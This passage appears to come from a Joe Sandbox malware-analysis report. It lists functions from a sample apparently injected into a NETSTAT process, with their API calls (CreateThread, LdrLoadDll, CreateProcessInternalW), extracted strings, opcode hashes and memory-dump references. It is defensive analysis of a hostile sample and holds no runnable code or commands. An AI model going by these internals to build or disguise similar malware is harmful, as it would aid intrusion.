                                                      control_flow_graph 498 3063c60-3063ca8 call 306b530 501 3063db4-3063dba 498->501 502 3063cae-3063d24 call 306b610 call 3054660 call 3041410 call 3061dc0 498->502 511 3063d30-3063d44 Sleep 502->511 512 3063d46-3063d58 511->512 513 3063da5-3063dac 511->513 514 3063d7a-3063d93 call 30661b0 512->514 515 3063d5a-3063d78 call 3066110 512->515 513->511 516 3063dae 513->516 520 3063d98-3063d9b 514->520 515->520 516->501 520->513
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 03063D3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: S,l$net.dll$wininet.dll
                                                      • API String ID: 3472027048-2096600126
                                                      • Opcode ID: 06aad819db55b54cb73b31747650b45bac9d94ca89ec9b38f7a1309c933c6986
                                                      • Instruction ID: 6534d6fb4bb7de48b5a6a877580008a39d303e5a89402d9f1b7cf29b2266ca22
                                                      • Opcode Fuzzy Hash: 06aad819db55b54cb73b31747650b45bac9d94ca89ec9b38f7a1309c933c6986
                                                      • Instruction Fuzzy Hash: D431B2B5A01309BBD714DFA4D880FEBB7B8FB84700F04856CEA59AF245D670A640CBE4
                                                      Function 03050E9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 0024f287092442c3bb48ea2141c5b692f14f792f62f28be91880a5ee56902452
                                                      • Instruction ID: c0110db3236046b4d88adcdcc8c9b9654a888b3ad077a791dfbcdf3b72c6c03f
                                                      • Opcode Fuzzy Hash: 0024f287092442c3bb48ea2141c5b692f14f792f62f28be91880a5ee56902452
                                                      • Instruction Fuzzy Hash: 7101C8B6D4221C7ADB01EBE48C81DEFBB7CEF81694F048068FA04AB100E5245E068BB1
                                                      Function 03050EA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 5f059e09acaf8460cea2afea9dc498a40f04ac28128d920a3877ce4df33e98c5
                                                      • Instruction ID: 9b969924194a6cd8131f36c61b4fb9dc3f7746818c604ef642060c2b51836168
                                                      • Opcode Fuzzy Hash: 5f059e09acaf8460cea2afea9dc498a40f04ac28128d920a3877ce4df33e98c5
                                                      • Instruction Fuzzy Hash: B201B9B5D4225D7AEB11EBE19C81DEFBB7CDF81694F058064FA04AB140E5385F068BB2
                                                      Function 03050E6C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 552 3050e6c-3050e8c 553 3050ee6-3050ee9 call 3061dc0 552->553 554 3050e8e 552->554 556 3050eee-3050f0a 553->556 555 3050e90-3050e97 554->555 554->556 558 3050f0c-3050f1b PostThreadMessageW 556->558 559 3050f2a-3050f30 556->559 558->559 560 3050f1d-3050f27 558->560 560->559
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: c2149d54fbcb7a27ec8a3b033cbb497f4e253c512d907e33953bc0c9b9ad8a95
                                                      • Instruction ID: d0b2232c75cec3b28228c524dffbebccba4c1a559ff9651748b816dcdc9b8868
                                                      • Opcode Fuzzy Hash: c2149d54fbcb7a27ec8a3b033cbb497f4e253c512d907e33953bc0c9b9ad8a95
                                                      • Instruction Fuzzy Hash: 1801F776A4615D778B11CF949D819EEBBACEF41254B08C0E9FE04DB200E7264A0687E1
                                                      Function 03050E98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: f642b4c908920e74acb01d33cfde92d15c6738d7b0689060c701193a75124f9c
                                                      • Instruction ID: 51efd74b3da51b917145e7da75c5aac46e892935f6dbdf11e58d3cf97ff2d064
                                                      • Opcode Fuzzy Hash: f642b4c908920e74acb01d33cfde92d15c6738d7b0689060c701193a75124f9c
                                                      • Instruction Fuzzy Hash: 67E08C26A4210EB69B1186D86C82CFFF7BCEE85B91F0480AAFE04E3100E1204A0547B1
                                                      Function 0305F699 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 978b4d7cb92aeeac9affc62e10f67c0d61431db467591ea583f1eca6845d463a
                                                      • Instruction ID: 67cd11f49c0e150a54d039ea0dbb53f42735e0d4d507522472836cf7a7ee1b04
                                                      • Opcode Fuzzy Hash: 978b4d7cb92aeeac9affc62e10f67c0d61431db467591ea583f1eca6845d463a
                                                      • Instruction Fuzzy Hash: CD313FB5A0060AAFDB00DFD8C8809EFB7B9BF88304B148559E905EB214D775EA458BA0
                                                      Function 0305F6A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 7e0f7648d3ed9cb0f58d444f79f3c4563d8b70a406b8dffcc5cb8f922ad922e8
                                                      • Instruction ID: 5689c3fdc9aa610abf7661ad34f27ca47206c20832297fc08b7c53bb606b5b83
                                                      • Opcode Fuzzy Hash: 7e0f7648d3ed9cb0f58d444f79f3c4563d8b70a406b8dffcc5cb8f922ad922e8
                                                      • Instruction Fuzzy Hash: 03312DB5A0060AEFDB10DFD8D8809EFB7B9BF88304B148559E905EB214D775EE05CBA0
                                                      Function 03054660 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030546D2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: c7f79262a1279ad7f3a6a6c56d154fd397bb3487976ff7f1465a53fedcc8fb06
                                                      • Instruction ID: d698c099dded341952ad9a505753f66426850c7386b82cb4f4cb8898f3273e38
                                                      • Opcode Fuzzy Hash: c7f79262a1279ad7f3a6a6c56d154fd397bb3487976ff7f1465a53fedcc8fb06
                                                      • Instruction Fuzzy Hash: DC0121BAE4120DABDF10EBE5DC41FDEB3B89B54208F044195ED08AB245F631E754CB92
                                                      Function 03069940 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,0305848E,00000010,?,?,?,00000044,?,00000010,0305848E,?,?,?), ref: 030699A0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: f5804be0c8644d8da80f2979e432fbf6f5ffe03a5844d5482ba4f2fe451744a2
                                                      • Instruction ID: c02feebf8da52aa678a410cc9af0de38154755277f3b02411f6961542b8cf608
                                                      • Opcode Fuzzy Hash: f5804be0c8644d8da80f2979e432fbf6f5ffe03a5844d5482ba4f2fe451744a2
                                                      • Instruction Fuzzy Hash: 960180B6205608BBDB44DE99DC80EEB77ADEF8C754F418208BA19E7244D630F851CBA4
                                                      Function 03049B20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03049B65
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: ae3a7e3f1d63bed824a21bfba6872ff91838c35e2be30c2d9bf0105260dc4a77
                                                      • Instruction ID: 6f4806f69104103708cfdac2b709f97654079cbf89198f2f53da8eddd5cc344d
                                                      • Opcode Fuzzy Hash: ae3a7e3f1d63bed824a21bfba6872ff91838c35e2be30c2d9bf0105260dc4a77
                                                      • Instruction Fuzzy Hash: D9F039B728131436E220A6E9AC02FDBA69C8BC0AA1F140466F70CEB280D995B54146E4
                                                      Function 03049B1C Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03049B65
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 228a461bdf4974414d1e89f0d8064c9c67cc85202c6688111f062804b3b1ab93
                                                      • Instruction ID: 8c37152c943649961412c4a48d75025bd16a6738de460c252be9cb1d7120a45f
                                                      • Opcode Fuzzy Hash: 228a461bdf4974414d1e89f0d8064c9c67cc85202c6688111f062804b3b1ab93
                                                      • Instruction Fuzzy Hash: ADF092BA28131436E230A2A99C02FEB769CCFC0FA0F140525F70DEF2C0D995B98146F8
                                                      Function 03069860 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(03051B39,?,03065D10,03051B39,0306584E,03065D10,?,03051B39,0306584E,00001000,?,?,00000000), ref: 0306989F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: a08255aaee45357fd6867a322680c5f9a97fab7e337603195b2343d66e074e34
                                                      • Instruction ID: 82a76973261dccf2dc780ed0efa438a6ea86ed1aa5cc1697a0ae59c287dd784d
                                                      • Opcode Fuzzy Hash: a08255aaee45357fd6867a322680c5f9a97fab7e337603195b2343d66e074e34
                                                      • Instruction Fuzzy Hash: 43E065B66003087BCA14EE59DC41EEB33ADEFC8750F008018F908AB241D7B0BD108AB8
                                                      Function 030698B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F85D8BCA,00000007,00000000,00000004,00000000,03053EE5,000000F4), ref: 030698EC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 1a998ab20a5bacbcc9c82fd52531f228d42c67c834812d489855736ad9a5cef6
                                                      • Instruction ID: 71843d0f0bc004e324a6c2734d8565ca3e40bb498e58745b54ba367bb204f471
                                                      • Opcode Fuzzy Hash: 1a998ab20a5bacbcc9c82fd52531f228d42c67c834812d489855736ad9a5cef6
                                                      • Instruction Fuzzy Hash: 34E065B62012047BC614EE59DC80FEB37ACEFC9790F004019FA08AB240C670B9118AB8
                                                      Function 030584D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030584FC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: f7db3c2d8492bcd982b7d47971c2e6cdb1c37da24ba5e1dda12d0dc67c727b6d
                                                      • Instruction ID: 5ecc6bfd0e59a3f74e3430da5f8108524ac00650f2c4f0558753ac1cc25b49a1
                                                      • Opcode Fuzzy Hash: f7db3c2d8492bcd982b7d47971c2e6cdb1c37da24ba5e1dda12d0dc67c727b6d
                                                      • Instruction Fuzzy Hash: 9EE04F7525130467EA64AAA89C49B66339C9B88764F288A60FD5DDB2C1E578F5018150
                                                      Function 030582C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,03051E30,0306818F,0306584E,03051DF3), ref: 030582F3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 0fe1b5bf81f5b8b1bdb6ac18254a5b93029c669eb538dc4edc0b6e48313896ae
                                                      • Instruction ID: 04958355b9fd0c77c79a8dd0e1d77e8a3ac489cbece5ae2a2be6f190d4812f5f
                                                      • Opcode Fuzzy Hash: 0fe1b5bf81f5b8b1bdb6ac18254a5b93029c669eb538dc4edc0b6e48313896ae
                                                      • Instruction Fuzzy Hash: 8BD05EB96843043BF644E7A4DC07F9A32CC8B80694F084464BB0CDB2C2ED65F60085A5
                                                      Function 030546F7 Relevance: 1.5, APIs: 1, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030546D2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 1eaff62f132b2d4574e25089534a72a857e5d291535941d73eeaf9ea7437390d
                                                      • Instruction ID: d0841222e01ba7485c9f1bdeb4988ef65968a0ab4914524cdd250bb06d76fe3e
                                                      • Opcode Fuzzy Hash: 1eaff62f132b2d4574e25089534a72a857e5d291535941d73eeaf9ea7437390d
                                                      • Instruction Fuzzy Hash: DFD01270A4510A6AD740CA98CC42FAAFBA4DB49205F0403C4B90C9B191D5716984C751
                                                      Function 03932C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                                                      • Instruction ID: 21704dffb9f327f28d602b929168d657cc32960343870785edf606786a471765
                                                      • Opcode Fuzzy Hash: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                                                      • Instruction Fuzzy Hash: 94B09B719055C5C5EA11F760460CB17794867D1741F19C4A1D2430741F4779D1D1E275

                                                      Non-executed Functions

                                                      Function 037104E8 Relevance: .1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84b21c5cb71a10b12884f1122754c9c1bd03932e749ca0b3ebd70d76463fb892
                                                      • Instruction ID: e600907ed6a1d8e39cdb27bd7ffbf148d491fd91a74a1ae3dacb874ae3df184a
                                                      • Opcode Fuzzy Hash: 84b21c5cb71a10b12884f1122754c9c1bd03932e749ca0b3ebd70d76463fb892
                                                      • Instruction Fuzzy Hash: 5841157251CB0D4FC368EF6C9081676F3E1FB85300F54062DC88AC7252EB74E8968785
                                                      Function 03713BBF Relevance: 61.4, Strings: 49, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .NE$ MSI$(com$.0.3$.0.5$.0C;$.5.3$0727$0729$0729$0; I$0; S$0; W$1; W$3; .$4.0 $; .N$; .N$; .N$; Me$; Tr$C 6.$Cent$E 7.$ET C$ET C$ET C$LCC2$LR 2$LR 3$LR 3$Mozi$NET4$OW64$SF@E$T 6.$T4.0$ZDR$ath.$ble;$dia $er P$iden$indo$lla/$nfoP$pati$t/4.$ws N
                                                      • API String ID: 0-559278899
                                                      • Opcode ID: 285c7517148fda3358df5a1d1762dca6f89b24ffce6e9b9dcdb4fda60653b725
                                                      • Instruction ID: 800360f5249317fbd9824be396df339fa60d529d800202add355f7f3693e3f68
                                                      • Opcode Fuzzy Hash: 285c7517148fda3358df5a1d1762dca6f89b24ffce6e9b9dcdb4fda60653b725
                                                      • Instruction Fuzzy Hash: 575130B480879CDFCF24DF84D0816EEBB71FF20305F809149E90A6E245C6B6865ACF89
                                                      Function 0371DFEA Relevance: 57.7, Strings: 46, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3754132690
                                                      • Opcode ID: bf675db7f5e95ab2965329e7c4f153a7e6a85b93a976927cae64253fb82c7364
                                                      • Instruction ID: fb3ab3b246fd30142d52268f25134b6c824c4c2b5f921e3adc05265a46c5cf3d
                                                      • Opcode Fuzzy Hash: bf675db7f5e95ab2965329e7c4f153a7e6a85b93a976927cae64253fb82c7364
                                                      • Instruction Fuzzy Hash: AD9151F04083948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89158B85
                                                      Function 03932890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                                                      • Instruction ID: 3f683ee95bb841d681bbd94a7617c6985ab16f3a7601c78e2f5a5c1fd4992e11
                                                      • Opcode Fuzzy Hash: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                                                      • Instruction Fuzzy Hash: 8651D6F6A00256BFCB14DF98C99097EF7BCFB4A2407148AA9E4A5D7641D374DE40CBA0
                                                      Function 039A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                                                      • Instruction ID: 59a4d2da6dacd6525301ddb14788c819f0979f4e425396a888117d662069a6a7
                                                      • Opcode Fuzzy Hash: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                                                      • Instruction Fuzzy Hash: A4510875A04A55AECB30DF9CC89097FF7FDEB44240B088DA9E5D5DB641E7B4DA0087A0
                                                      Function 03927630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03964742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039646FC
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03964787
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03964725
                                                      • ExecuteOptions, xrefs: 039646A0
                                                      • Execute=1, xrefs: 03964713
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03964655
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                                                      • Instruction ID: a33dfec2e5276b0dc6c4e6e15b7d280eb08007d883385ca49c6a40575bcb158f
                                                      • Opcode Fuzzy Hash: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                                                      • Instruction Fuzzy Hash: D9513735A017296ADF10FAE8DC89FAE7BACAF44340F0404E9D505FB186E7719A45CF51
                                                      Function 039C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
